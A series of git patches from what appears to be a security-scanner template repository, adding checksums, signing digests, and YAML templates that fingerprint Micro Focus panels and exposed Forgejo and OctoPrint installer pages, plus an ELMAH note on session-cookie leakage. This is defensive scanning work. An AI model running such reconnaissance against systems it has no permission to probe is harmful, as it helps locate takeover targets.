http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921 http/cves/2024/CVE-2024-32651.yaml:644d79d1e5be106386851b644d904c48a003d4b5 http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17 +http/cves/2024/CVE-2024-33288.yaml:be6ad313e9030dff2c7c036bd3887b32777b2120 http/cves/2024/CVE-2024-33575.yaml:ad19d994ed8f29c8ffca72103c5419713853271b http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c @@ -8540,7 +8541,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5468afe63e9cb7d020875f12c43a0fb8cf98f91d +templates-checksum.txt:85b9a8d51ed310ef703f4e9e572e29cae8f119fe wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6c23347f15fc1cbc25286e48ba2c9fb80877d962 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 20 May 2024 17:12:26 +0000 Subject: [PATCH 1136/1768] Auto Generated New Template Addition List [Mon May 20 17:12:25 UTC 2024] :robot: --- .new-additions | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.new-additions b/.new-additions index b4b4cc93eb..be83b3912a 100644 --- a/.new-additions +++ b/.new-additions @@ -6,9 +6,11 @@ http/cves/2023/CVE-2023-43374.yaml http/cves/2023/CVE-2023-44813.yaml http/cves/2023/CVE-2023-45855.yaml http/cves/2023/CVE-2023-5991.yaml +http/cves/2023/CVE-2023-6065.yaml http/cves/2024/CVE-2024-0200.yaml http/cves/2024/CVE-2024-1561.yaml http/cves/2024/CVE-2024-3097.yaml +http/cves/2024/CVE-2024-33288.yaml http/default-logins/softether/softether-vpn-default-login.yaml http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml @@ -24,7 +26,9 @@ http/exposed-panels/tiny-rss-panel.yaml http/exposed-panels/unleash-panel.yaml http/honeypot/tpot-honeypot-detect.yaml http/misconfiguration/installer/custom-xoops-installer.yaml +http/misconfiguration/installer/easy-viserlabs-installer.yaml http/misconfiguration/installer/froxlor-installer.yaml +http/misconfiguration/installer/ids-skills-installer.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/misconfiguration/installer/trilium-notes-installer.yaml From d8836f303acd6fd28c314020542ca6c58fff0149 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 20 May 2024 17:12:42 +0000 Subject: [PATCH 1138/1768] Auto Generated Templates Checksum [Mon May 20 17:12:42 UTC 2024] :robot: --- templates-checksum.txt | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 38dded005c..6cfe2a73f3 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3217,6 +3217,7 @@ http/cves/2023/CVE-2023-6021.yaml:600bdb52150fc4bfebfd9c76945beb2ab94e7600 http/cves/2023/CVE-2023-6023.yaml:c537c8a9c6bae27008abc07163a9f67f083e77c1 http/cves/2023/CVE-2023-6038.yaml:38ab1d22eb9a68f42042f232196bd556273e75e1 http/cves/2023/CVE-2023-6063.yaml:ce30538ac7371880f65b9247ca0da8dd6e844c05 +http/cves/2023/CVE-2023-6065.yaml:ec709351895594195cd98f73ad9df3dcd7487d61 http/cves/2023/CVE-2023-6114.yaml:fb42b31775be2bbad24ddc15474b08d1d5a14341 http/cves/2023/CVE-2023-6360.yaml:02f33c56e0b2c876afb8067605ecea59372947b6 http/cves/2023/CVE-2023-6379.yaml:6ebc677324ecc29a9012474f6228f27be950dee0 @@ -5397,6 +5398,7 @@ http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b431 http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057 http/misconfiguration/installer/drupal-install.yaml:afa701be86d508093f72f596b7381ed76abd7c36 +http/misconfiguration/installer/easy-viserlabs-installer.yaml:27d9b628a6aa3315ab36792659f07e5b2aa37968 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99 @@ -5409,6 +5411,7 @@ http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c http/misconfiguration/installer/gibbon-installer.yaml:c22815fca903475c70deeecb36bb5ca4bdde2283 http/misconfiguration/installer/gitea-installer.yaml:5e6a8a0d61e3cf52bdaeb96c7a1784a046292e7e http/misconfiguration/installer/gogs-installer.yaml:761e7ee7354915c029670f36c1360b8d8bb97a4d +http/misconfiguration/installer/ids-skills-installer.yaml:095eb407b5a42dfeb59dc77420189df7a9200249 http/misconfiguration/installer/impresspages-installer.yaml:a202181818bcfe8005a744f81027dc06de05dc40 http/misconfiguration/installer/imprivata-installer.yaml:876cea672f3efc0085a779a6d8c9305c994a2ea3 http/misconfiguration/installer/indegy-sensor-installer.yaml:deaa2d09c184bd9eee230c651699d1f1ccc8afcc @@ -8541,7 +8544,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:85b9a8d51ed310ef703f4e9e572e29cae8f119fe +templates-checksum.txt:8df1977f5606fe1c17bd7067982ebf8e2bcee7f3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 586308ecc93e5f9003d0b2a92fccecb13ff6f9be Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 20 May 2024 17:13:08 +0000 Subject: [PATCH 1139/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 37fdd42f29..919dfe9a16 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,9 +11,11 @@ on: - 'http/cves/2023/CVE-2023-44813.yaml' - 'http/cves/2023/CVE-2023-45855.yaml' - 'http/cves/2023/CVE-2023-5991.yaml' + - 'http/cves/2023/CVE-2023-6065.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/cves/2024/CVE-2024-1561.yaml' - 'http/cves/2024/CVE-2024-3097.yaml' + - 'http/cves/2024/CVE-2024-33288.yaml' - 'http/default-logins/softether/softether-vpn-default-login.yaml' - 'http/exposed-panels/ackee-panel.yaml' - 'http/exposed-panels/craftercms-panel.yaml' @@ -29,7 +31,9 @@ on: - 'http/exposed-panels/unleash-panel.yaml' - 'http/honeypot/tpot-honeypot-detect.yaml' - 'http/misconfiguration/installer/custom-xoops-installer.yaml' + - 'http/misconfiguration/installer/easy-viserlabs-installer.yaml' - 'http/misconfiguration/installer/froxlor-installer.yaml' + - 'http/misconfiguration/installer/ids-skills-installer.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/misconfiguration/installer/trilium-notes-installer.yaml' From 03a3ee50afb4caa900d184790a02102cb844413d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 20 May 2024 17:13:52 +0000 Subject: [PATCH 1140/1768] Auto Template Signing [Mon May 20 17:13:52 UTC 2024] :robot: --- http/cves/2024/CVE-2024-33288.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-33288.yaml b/http/cves/2024/CVE-2024-33288.yaml index 23f85208d8..e21a1bf426 100644 --- a/http/cves/2024/CVE-2024-33288.yaml +++ b/http/cves/2024/CVE-2024-33288.yaml @@ -40,3 +40,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100859ec311a5b87c8613179df918539075c5fd10a9d17a0273f0970d74ab5ea0e90221008c39c278e0ce4d1b08af7daa3356e7901998adf7c17a2919323d4a935efff082:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d0cb8ec2ec256e7e491fdc192a814375574175cd Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 20 May 2024 19:38:54 +0200 Subject: [PATCH 1141/1768] Add files via upload --- ...pplication-lifecycle-management-panel.yaml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml diff --git a/http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml b/http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml new file mode 100644 index 0000000000..0f10c8531b --- /dev/null +++ b/http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml @@ -0,0 +1,37 @@ +id: microfocus-application-lifecycle-management-panel + +info: + name: Micro Focus Application Lifecycle Management Panel - Detect + author: righettod + severity: info + description: | + Micro Focus Application Lifecycle Management login panel was detected. + reference: + - https://www.microfocus.com/ + metadata: + max-request: 1 + verified: true + shodan-query: http.html:"Micro Focus Application Lifecycle Management" + tags: panel,microfocus,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/qcbin/" + + redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "micro focus application lifecycle management", "
application lifecycle", "

application lifecycle")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)Micro\s+Focus\s+Application\s+Lifecycle\s+Management\s+([0-9.]+)' \ No newline at end of file From 30de1cb4859427308b74c315b45f969228d4ab98 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 20 May 2024 19:42:48 +0200 Subject: [PATCH 1142/1768] Updated reference URL --- .../microfocus-application-lifecycle-management-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml b/http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml index 0f10c8531b..1265b3970d 100644 --- a/http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml +++ b/http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml @@ -7,7 +7,7 @@ info: description: | Micro Focus Application Lifecycle Management login panel was detected. reference: - - https://www.microfocus.com/ + - https://www.opentext.com/products/alm-quality-center metadata: max-request: 1 verified: true @@ -34,4 +34,4 @@ http: part: body group: 1 regex: - - '(?i)Micro\s+Focus\s+Application\s+Lifecycle\s+Management\s+([0-9.]+)' \ No newline at end of file + - '(?i)Micro\s+Focus\s+Application\s+Lifecycle\s+Management\s+([0-9.]+)' From a6aa7e0ba6ee18a646971613ea3a4ef829c7723d Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 20 May 2024 20:04:20 +0200 Subject: [PATCH 1143/1768] Add files via upload --- .../microfocus-iprint-appliance-detect.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/technologies/microfocus-iprint-appliance-detect.yaml diff --git a/http/technologies/microfocus-iprint-appliance-detect.yaml b/http/technologies/microfocus-iprint-appliance-detect.yaml new file mode 100644 index 0000000000..33d6e1f433 --- /dev/null +++ b/http/technologies/microfocus-iprint-appliance-detect.yaml @@ -0,0 +1,34 @@ +id: microfocus-iprint-appliance-detect + +info: + name: Micro Focus iPrint Appliance - Detect + author: righettod + severity: info + description: | + Micro Focus iPrint Appliance was detected. + reference: + - https://www.opentext.com/products/enterprise-server + metadata: + max-request: 1 + verified: true + shodan-query: http.html:"Micro Focus iPrint Appliance" + tags: tech,microfocus,detect + +http: + - method: GET + path: + - "{{BaseURL}}/welcome/" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "micro focus iprint appliance", "/ippdocs/clients/", "micro focus iprint", "iprint appliance")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)/welcome/css/core([0-9]+).css' \ No newline at end of file From fe388f7da9dde620d340c7c3762afeda4bd03889 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= Date: Tue, 21 May 2024 09:23:30 +0200 Subject: [PATCH 1144/1768] Increasing severity of elmah logs exposure that can lead to session hijacking --- http/exposures/logs/elmah-log-file.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposures/logs/elmah-log-file.yaml b/http/exposures/logs/elmah-log-file.yaml index 2013e629ca..e917652778 100644 --- a/http/exposures/logs/elmah-log-file.yaml +++ b/http/exposures/logs/elmah-log-file.yaml @@ -3,9 +3,9 @@ id: elmah-log-file info: name: ELMAH Exposure author: shine,idealphase - severity: medium + severity: high description: | - ELMAH (Error Logging Modules and Handlers) is an application-wide error logging facility that is completely pluggable. It can be dynamically added to a running ASP.NET web application, or even all ASP.NET web applications on a machine, without any need for re-compilation or re-deployment. + ELMAH (Error Logging Modules and Handlers) is an application-wide error logging facility that is completely pluggable. It can be dynamically added to a running ASP.NET web application, or even all ASP.NET web applications on a machine, without any need for re-compilation or re-deployment. In some cases, the logs expose ASPXAUTH cookies allowing to hijack a logged in administrator session. reference: - https://code.google.com/archive/p/elmah/ - https://www.troyhunt.com/aspnet-session-hijacking-with-google/ From 61648817a5767796bf6f33b7d97ebd44b12294eb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 21 May 2024 13:37:13 +0530 Subject: [PATCH 1145/1768] minor update --- ...-management-panel.yaml => microfocus-lifecycle-panel.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename http/exposed-panels/{microfocus-application-lifecycle-management-panel.yaml => microfocus-lifecycle-panel.yaml} (88%) diff --git a/http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml b/http/exposed-panels/microfocus-lifecycle-panel.yaml similarity index 88% rename from http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml rename to http/exposed-panels/microfocus-lifecycle-panel.yaml index 1265b3970d..8b67bcf5bf 100644 --- a/http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml +++ b/http/exposed-panels/microfocus-lifecycle-panel.yaml @@ -1,7 +1,7 @@ -id: microfocus-application-lifecycle-management-panel +id: microfocus-lifecycle-panel info: - name: Micro Focus Application Lifecycle Management Panel - Detect + name: Micro Focus Application Lifecycle Management - Panel author: righettod severity: info description: | From b69272fd9f11d5005af842848c8604c6b06f1a3d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 21 May 2024 13:41:05 +0530 Subject: [PATCH 1146/1768] minor update --- ...nt-appliance-detect.yaml => microfocus-iprint-detect.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename http/technologies/{microfocus-iprint-appliance-detect.yaml => microfocus-iprint-detect.yaml} (89%) diff --git a/http/technologies/microfocus-iprint-appliance-detect.yaml b/http/technologies/microfocus-iprint-detect.yaml similarity index 89% rename from http/technologies/microfocus-iprint-appliance-detect.yaml rename to http/technologies/microfocus-iprint-detect.yaml index 33d6e1f433..2ace39fa15 100644 --- a/http/technologies/microfocus-iprint-appliance-detect.yaml +++ b/http/technologies/microfocus-iprint-detect.yaml @@ -1,4 +1,4 @@ -id: microfocus-iprint-appliance-detect +id: microfocus-iprint-detect info: name: Micro Focus iPrint Appliance - Detect @@ -31,4 +31,4 @@ http: part: body group: 1 regex: - - '(?i)/welcome/css/core([0-9]+).css' \ No newline at end of file + - '(?i)/welcome/css/core([0-9]+).css' From 8c77d593bfb063ac234b2353d97b4aa7fe0ecf4f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 21 May 2024 14:17:41 +0530 Subject: [PATCH 1147/1768] Create forgejo-installer.yaml --- .../installer/forgejo-installer.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/misconfiguration/installer/forgejo-installer.yaml diff --git a/http/misconfiguration/installer/forgejo-installer.yaml b/http/misconfiguration/installer/forgejo-installer.yaml new file mode 100644 index 0000000000..707efcffd5 --- /dev/null +++ b/http/misconfiguration/installer/forgejo-installer.yaml @@ -0,0 +1,29 @@ +id: forgejo-installer + +info: + name: Forgejo Installation Page - Exposure + author: DhiyaneshDk + severity: high + description: | + Checks for the presence of a Forgejo Installer Page. + metadata: + verified: true + max-request: 1 + fofa-query: body="Installation - Forgejo:" + tags: install,Forgejo,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Installation - Forgejo: Beyond coding. We Forge." + + - type: status + status: + - 200 From 8851962c9780aca669feadc626945d6be619cfc1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 21 May 2024 09:09:10 +0000 Subject: [PATCH 1148/1768] Auto Generated New Template Addition List [Tue May 21 09:09:10 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index be83b3912a..a0f464fb75 100644 --- a/.new-additions +++ b/.new-additions @@ -25,6 +25,7 @@ http/exposed-panels/qlikview-accesspoint-panel.yaml http/exposed-panels/tiny-rss-panel.yaml http/exposed-panels/unleash-panel.yaml http/honeypot/tpot-honeypot-detect.yaml +http/misconfiguration/imgproxy-unauth.yaml http/misconfiguration/installer/custom-xoops-installer.yaml http/misconfiguration/installer/easy-viserlabs-installer.yaml http/misconfiguration/installer/froxlor-installer.yaml From 3aefc062b20f2d0ffa35c0578381ff5f3d3f3511 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 21 May 2024 09:09:14 +0000 Subject: [PATCH 1149/1768] Auto Generated Templates Checksum [Tue May 21 09:09:14 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6cfe2a73f3..d04740ad2a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3294,7 +3294,7 @@ http/cves/2024/CVE-2024-32399.yaml:afc357068e3f6e9ef3aa6910a122ee7bd47ac60d http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921 http/cves/2024/CVE-2024-32651.yaml:644d79d1e5be106386851b644d904c48a003d4b5 http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17 -http/cves/2024/CVE-2024-33288.yaml:be6ad313e9030dff2c7c036bd3887b32777b2120 +http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:ad19d994ed8f29c8ffca72103c5419713853271b http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c @@ -5371,6 +5371,7 @@ http/misconfiguration/http-missing-security-headers.yaml:62e00bd5126dbd778c766aa http/misconfiguration/https-to-http-redirect.yaml:cccf8e9ceb416d8e224b314e9952d676e592c00e http/misconfiguration/ibm-friendly-path-exposure.yaml:77e6c72a9cae1a9b0a6afd79b159b08db996e463 http/misconfiguration/ibm-websphere-xml.yaml:659d65c9f64e0b6ce45ec519419cdfaf9cb77fd1 +http/misconfiguration/imgproxy-unauth.yaml:1a65d48eccec521f1c6530ddf0fa01fdce317513 http/misconfiguration/installer/acunetix-360-installer.yaml:13688236245b336b6a74b5b2ddce35d2e35f6421 http/misconfiguration/installer/akeeba-installer.yaml:56fc3c8f70ae91e8cb4207b97c0b088a845537f4 http/misconfiguration/installer/alma-installer.yaml:50fb01e501f60ce17284f44c30bf672eb6986d6a @@ -8544,7 +8545,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8df1977f5606fe1c17bd7067982ebf8e2bcee7f3 +templates-checksum.txt:f2b21047cb599e49254aa764ac839fd1da9f9efc wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 164bf43349d50c64a9fadc469dfd5109b9f6be0a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 21 May 2024 14:39:47 +0530 Subject: [PATCH 1150/1768] Create octoprint-installer.yaml --- .../installer/octoprint-installer.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/misconfiguration/installer/octoprint-installer.yaml diff --git a/http/misconfiguration/installer/octoprint-installer.yaml b/http/misconfiguration/installer/octoprint-installer.yaml new file mode 100644 index 0000000000..e21886aefa --- /dev/null +++ b/http/misconfiguration/installer/octoprint-installer.yaml @@ -0,0 +1,29 @@ +id: octoprint-installer + +info: + name: OctoPrint Installation Page - Exposure + author: DhiyaneshDk + severity: high + description: | + Checks for the presence of a OctoPrint Installer Page. + metadata: + verified: true + max-request: 1 + fofa-query: body="Thank you for installing OctoPrint" + tags: install,octoprint,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Thank you for installing OctoPrint" + + - type: status + status: + - 200 From b3be8b6c6c59b6b1d6ef6e0324ddf777a871d6b8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 21 May 2024 09:09:59 +0000 Subject: [PATCH 1151/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 919dfe9a16..996f14cfb9 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -30,6 +30,7 @@ on: - 'http/exposed-panels/tiny-rss-panel.yaml' - 'http/exposed-panels/unleash-panel.yaml' - 'http/honeypot/tpot-honeypot-detect.yaml' + - 'http/misconfiguration/imgproxy-unauth.yaml' - 'http/misconfiguration/installer/custom-xoops-installer.yaml' - 'http/misconfiguration/installer/easy-viserlabs-installer.yaml' - 'http/misconfiguration/installer/froxlor-installer.yaml' From bb0874bc908dfbea4e578a089fd0c7fde3e1bff6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 21 May 2024 09:11:01 +0000 Subject: [PATCH 1152/1768] Auto Template Signing [Tue May 21 09:11:01 UTC 2024] :robot: --- http/cves/2023/CVE-2023-6065.yaml | 1 + http/misconfiguration/imgproxy-unauth.yaml | 1 + http/misconfiguration/installer/easy-viserlabs-installer.yaml | 1 + http/misconfiguration/installer/ids-skills-installer.yaml | 1 + 4 files changed, 4 insertions(+) diff --git a/http/cves/2023/CVE-2023-6065.yaml b/http/cves/2023/CVE-2023-6065.yaml index 18d4cec997..a5eee969f4 100644 --- a/http/cves/2023/CVE-2023-6065.yaml +++ b/http/cves/2023/CVE-2023-6065.yaml @@ -49,3 +49,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502207d57bed9f86a5c3790fab7c7ad97d0ce2a40a3769cadf8c03db9fe296816f3dc022100a72b53af19a2d49d7d48f413a62219b54ef121d6c17aa1c35758f4608f69b95f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/imgproxy-unauth.yaml b/http/misconfiguration/imgproxy-unauth.yaml index 4816d4045c..5983e67f77 100644 --- a/http/misconfiguration/imgproxy-unauth.yaml +++ b/http/misconfiguration/imgproxy-unauth.yaml @@ -33,3 +33,4 @@ http: - 'contains(content_type, "image/png")' - '("386116288" == mmh3(base64_py(body)))' condition: and +# digest: 490a0046304402207f4d9df78ca765af9dc185001591fb4b8bd55d95b545a96a8dbba3243c94bc86022062bc7d5358e243a9a43fcca3c3e5e7a9addfa3f57df917e39c3c00fba60c07c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/easy-viserlabs-installer.yaml b/http/misconfiguration/installer/easy-viserlabs-installer.yaml index 2aea23abde..74f33dd9d9 100644 --- a/http/misconfiguration/installer/easy-viserlabs-installer.yaml +++ b/http/misconfiguration/installer/easy-viserlabs-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402203886cb97031c26142c599a4fa18efc3507221c123a23172407e1a98b70bceeec022006e69859071989ef5d3c00816d76ba1b45c8d60fd3b878d6575542042698560b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/ids-skills-installer.yaml b/http/misconfiguration/installer/ids-skills-installer.yaml index 38d61998d8..0751655fde 100644 --- a/http/misconfiguration/installer/ids-skills-installer.yaml +++ b/http/misconfiguration/installer/ids-skills-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100c7c24577b37209b700ba3a4e8031c2e6241c0d3ca584c5d01256a0ca36e5e63e022048981b51d5fcda350ed38362e7124c669d6818ef760b8f744c62e72a10ca7be3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f24bc553334ce671da8cf6a805cd9829955fcfe6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 21 May 2024 14:44:02 +0530 Subject: [PATCH 1153/1768] Update and rename oracle-ebusiness-suite-panel.yaml to oracle-ebusiness-panel.yaml --- ...ebusiness-suite-panel.yaml => oracle-ebusiness-panel.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename http/exposed-panels/{oracle-ebusiness-suite-panel.yaml => oracle-ebusiness-panel.yaml} (84%) diff --git a/http/exposed-panels/oracle-ebusiness-suite-panel.yaml b/http/exposed-panels/oracle-ebusiness-panel.yaml similarity index 84% rename from http/exposed-panels/oracle-ebusiness-suite-panel.yaml rename to http/exposed-panels/oracle-ebusiness-panel.yaml index 12ae7d385b..5cc6798cd6 100644 --- a/http/exposed-panels/oracle-ebusiness-suite-panel.yaml +++ b/http/exposed-panels/oracle-ebusiness-panel.yaml @@ -1,4 +1,4 @@ -id: oracle-ebusiness-suite-panel +id: oracle-ebusiness-panel info: name: Oracle E-Business Suite Login Panel - Detect @@ -34,4 +34,4 @@ http: part: body group: 1 regex: - - '(?i)/OA_HTML/cabo/oajsLibs/oafcore([A-Z0-9]+).js' \ No newline at end of file + - '(?i)/OA_HTML/cabo/oajsLibs/oafcore([A-Z0-9]+).js' From 94a6ef5f02f1f30059a64a3ea4989b51e6a8bd7c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 21 May 2024 09:18:59 +0000 Subject: [PATCH 1154/1768] Auto Generated Templates Checksum [Tue May 21 09:18:59 UTC 2024] :robot: --- templates-checksum.txt | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d04740ad2a..ab566aa020 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3217,7 +3217,7 @@ http/cves/2023/CVE-2023-6021.yaml:600bdb52150fc4bfebfd9c76945beb2ab94e7600 http/cves/2023/CVE-2023-6023.yaml:c537c8a9c6bae27008abc07163a9f67f083e77c1 http/cves/2023/CVE-2023-6038.yaml:38ab1d22eb9a68f42042f232196bd556273e75e1 http/cves/2023/CVE-2023-6063.yaml:ce30538ac7371880f65b9247ca0da8dd6e844c05 -http/cves/2023/CVE-2023-6065.yaml:ec709351895594195cd98f73ad9df3dcd7487d61 +http/cves/2023/CVE-2023-6065.yaml:5583e9a287accbae3c6b84b7f5b4c3e4105e4cea http/cves/2023/CVE-2023-6114.yaml:fb42b31775be2bbad24ddc15474b08d1d5a14341 http/cves/2023/CVE-2023-6360.yaml:02f33c56e0b2c876afb8067605ecea59372947b6 http/cves/2023/CVE-2023-6379.yaml:6ebc677324ecc29a9012474f6228f27be950dee0 @@ -4174,6 +4174,7 @@ http/exposed-panels/opinio-panel.yaml:6f9232a1cd33bd4b348c6274cdd2436d7eb04405 http/exposed-panels/oracle-business-control.yaml:1a40c6d9b1046d965a1e9fecd649423329de4de4 http/exposed-panels/oracle-business-intelligence.yaml:7ae31ff5ddccb3f4a213467b032af88787cf2b49 http/exposed-panels/oracle-containers-panel.yaml:5ff1a1b8e8025efcd64744c2f89e9cc2132b40d1 +http/exposed-panels/oracle-ebusiness-panel.yaml:a1e3aced3d8371d404cc5b765705fefbd76dc7de 